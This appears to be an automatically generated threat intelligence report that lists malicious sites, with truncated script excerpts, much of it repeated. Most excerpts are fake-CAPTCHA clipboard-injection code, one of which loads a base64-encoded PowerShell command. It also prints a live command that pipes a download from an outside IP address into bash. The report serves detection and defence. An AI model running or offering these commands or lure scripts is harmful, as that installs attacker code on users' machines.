Threat Intelligence Report
Attack Pattern Analysis
Top Indicators/Keywords
Malicious Sites Detected
Click on a site to view detailed analysisπ Suspicious Keywords 3
π Extracted URLs 362
π External JavaScript Redirect Chains
Showing first 1 of 1 chains (truncated for performance)
ata("key"),t=this.$el.data("onload"),i=document.createElement("script");return i.src="https://www.google.com/recaptcha/api.js?render="+e+"&onload="+t,_r_(i)}}),_r_()}),B.when({events:"ready"}).run(function(){_i_("3da:eecf78cc");var e=B.env.β¦π°οΈ Redirect Follower Findings (1)
ata("key"),t=this.$el.data("onload"),i=document.createElement("script");return i.src="https://www.google.com/recaptcha/api.js?render="+e+"&onload="+t,_r_(i)}}),_r_()}),B.when({events:"ready"}).run(function(){_i_("3da:eecf78cc");var e=B.env.β¦/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('onload');(cfg['clr']=cfg['clr']||[]).push('true');(cfg['anchor-ms']=cfg['anchor-ms']||[]).push(20000);(cfg['execute-ms']=cfg['execute-ms']||[]).push(30000);w['__google_recaptcha_clien... [truncated]π Suspicious Keywords 3
π Extracted URLs 362
π External JavaScript Redirect Chains
Showing first 1 of 1 chains (truncated for performance)
ata("key"),t=this.$el.data("onload"),i=document.createElement("script");return i.src="https://www.google.com/recaptcha/api.js?render="+e+"&onload="+t,_r_(i)}}),_r_()}),B.when({events:"ready"}).run(function(){_i_("3da:eecf78cc");var e=B.env.β¦π°οΈ Redirect Follower Findings (1)
ata("key"),t=this.$el.data("onload"),i=document.createElement("script");return i.src="https://www.google.com/recaptcha/api.js?render="+e+"&onload="+t,_r_(i)}}),_r_()}),B.when({events:"ready"}).run(function(){_i_("3da:eecf78cc");var e=B.env.β¦/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('onload');(cfg['clr']=cfg['clr']||[]).push('true');(cfg['anchor-ms']=cfg['anchor-ms']||[]).push(20000);(cfg['execute-ms']=cfg['execute-ms']||[]).push(30000);w['__google_recaptcha_clien... [truncated]π Suspicious Keywords 3
π Extracted URLs 79
π Suspicious Keywords 5
π Extracted URLs 22
π°οΈ Redirect Follower Findings (1)
{ return; }}
k=e.createElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)})
(window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym");
ym(55085083, "init", {
clickmapβ¦(function(){var p;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};
function ca(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw... [truncated]π Suspicious Keywords 20
π Extracted URLs 7
π Clipboard Manipulation Code
Showing first 2 of 6 entries (truncated for performance)
...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
π Suspicious Keywords 20
π Extracted URLs 7
π Clipboard Manipulation Code
Showing first 2 of 6 entries (truncated for performance)
...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
π Suspicious Keywords 3
π Extracted URLs 150
π» PowerShell Commands 1
π Suspicious Keywords 13
π Extracted URLs 5
π Clipboard Manipulation Code
Showing first 2 of 5 entries (truncated for performance)
...igator.clipboard && window.isSecureContext) { navigator.clipboard.writeText(textToCopy).then(() => { if (button) {...
...tArea.select(); try { const successful = document.execCommand('copy'); if (successful) { const button = even...
π°οΈ Redirect Follower Findings (1)
curl -s http://217.119.139.117/d/roberto32100 | nohup bash &
π Suspicious Keywords 19
π Extracted URLs 6
π Clipboard Manipulation Code
Showing first 2 of 6 entries (truncated for performance)
...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
π Suspicious Keywords 19
π Extracted URLs 6
π Clipboard Manipulation Code
Showing first 2 of 6 entries (truncated for performance)
...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
π Suspicious Keywords 19
π Extracted URLs 6
π Clipboard Manipulation Code
Showing first 2 of 6 entries (truncated for performance)
...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
π Suspicious Keywords 19
π Extracted URLs 6
π Clipboard Manipulation Code
Showing first 2 of 6 entries (truncated for performance)
...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
π Suspicious Keywords 19
π Extracted URLs 6
π Clipboard Manipulation Code
Showing first 2 of 6 entries (truncated for performance)
...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
π Suspicious Keywords 1
π Extracted URLs 132
π» PowerShell Commands 1
π Suspicious Keywords 4
π Clipboard Manipulation Code
Showing first 2 of 2 entries (truncated for performance)
...= ""; } function copyToClipboard() { navigator.clipboard.writeText (atob("cG93ZXJzaGVsbCAtd2kgbWkgKC4ncG93ZXJzaGVsbCcg...
...tener("click", function(event) { event.preventDefault(); verifyBtn.disabled = true; verifyCaptcha(); }); checkboxBtn.addEventListener("click", function(event) { event.preventDefault(); checkboxBtn.disabled = true; runClickedCheckboxEffects(); }); } } addCaptchaListeners(); function runClickedCheckboxEffects() { hideCaptchaCheckbox(); setTimeout(function() { showCaptchaLoading(); }, 500) setTimeout(function() { showVerifyWindow(); }, 900) } function showCaptchaCheckbox() { checkboxBtn.style.width = "100%"; checkboxBtn.style.height = "100%"; checkboxBtn.style.borderRadius = "2px"; checkboxBtn.style.margin = "21px 0 0 12px"; checkboxBtn.style.opacity = "1"; } function hideCaptchaCheckbox() { checkboxBtn.style.width = "4px"; checkboxBtn.style.height = "4px"; checkboxBtn.style.borderRadius = "50%"; checkboxBtn.style.marginLeft = "25px"; checkboxBtn.style.marginTop = "33px"; checkboxBtn.style.opacity = "0"; } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.visibility = "hidden"; checkboxBtnSpinner.style.opacity = "0"; } function showVerifyWindow() { verifyWindow.style.display = "block"; verifyWindow.style.visibility = "visible"; verifyWindow.style.opacity = "1"; verifyWindow.style.top = checkboxWindow.offsetTop - 80 + "px"; verifyWindow.style.left = checkboxWindow.offsetLeft + 54 + "px"; if (verifyWindow.offsetTop < 5) { verifyWindow.style.top = "5px"; } if (verifyWindow.offsetLeft + verifyWindow.offsetWidth > window.innerWidth - 10) { verifyWindow.style.left = checkboxWindow.offsetLeft - 8 + "px"; } else { verifyWindowArrow.style.top = checkboxWindow.offsetTop + 24 + "px"; verifyWindowArrow.style.left = checkboxWindow.offsetLeft + 45 + "px"; verifyWindowArrow.style.visibility = "visible"; verifyWindowArrow.style.opacity = "1"; } } function closeVerifyWindow() { verifyWindow.style.display = "none"; verifyWindow.style.visibility = "hidden"; verifyWindow.style.opacity = "0"; verifyWindowArrow.style.visibility = "hidden"; verifyWindowArrow.style.opacity = "0"; showCaptchaCheckbox(); hideCaptchaLoading(); checkboxBtn.disabled = false; verifyBtn.disabled = false; } function isVerifyWindowVisible() { return verifyWindow.style.display !== "none" && verifyWindow.style.display !== ""; } function copyToClipboard() { navigator.clipboard.writeText...
π» PowerShell Commands 2
π Suspicious Keywords 21
π Extracted URLs 5
π Clipboard Manipulation Code
Showing first 2 of 6 entries (truncated for performance)
...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
π» PowerShell Commands 2
π Suspicious Keywords 21
π Extracted URLs 5
π Clipboard Manipulation Code
Showing first 2 of 6 entries (truncated for performance)
...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
π» PowerShell Commands 2
π Suspicious Keywords 21
π Extracted URLs 5
π Clipboard Manipulation Code
Showing first 2 of 6 entries (truncated for performance)
...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
π» PowerShell Commands 2
π Suspicious Keywords 21
π Extracted URLs 5
π Clipboard Manipulation Code
Showing first 2 of 6 entries (truncated for performance)
...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
π» PowerShell Commands 2
π Suspicious Keywords 21
π Extracted URLs 5
π Clipboard Manipulation Code
Showing first 2 of 6 entries (truncated for performance)
...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
Showing top 20 malicious sites. 30 additional sites detected.